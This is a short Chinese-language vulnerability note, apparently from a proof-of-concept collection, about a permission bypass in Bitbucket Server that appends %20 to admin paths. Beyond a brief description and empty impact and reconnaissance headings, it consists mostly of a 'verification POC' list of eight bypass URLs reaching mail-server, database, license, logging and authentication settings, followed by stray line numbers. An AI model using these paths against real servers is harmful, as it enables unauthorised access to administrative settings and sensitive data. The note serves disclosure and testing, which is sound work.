# Bitbucket 登录绕过漏洞
# 漏洞描述
此错误已修复并部署在 Bitbucket Server > 4.8 上。Bitbucket 由 Atlassian 团队开发。其中出现了一个通过 %20 绕过权限的漏洞,导致任意用户可获取敏感数据
# 漏洞影响
# 网络测绘
# 漏洞复现
登录页面
验证POC
/admin%20/mail-server
/admin%20/db
/admin%20/db/edit
/admin%20/license
/admin%20/logging
/admin%20/server-settings
/admin%20/authentication
/admin%20/avatars
1
2
3
4
5
6
7
8
2
3
4
5
6
7
8
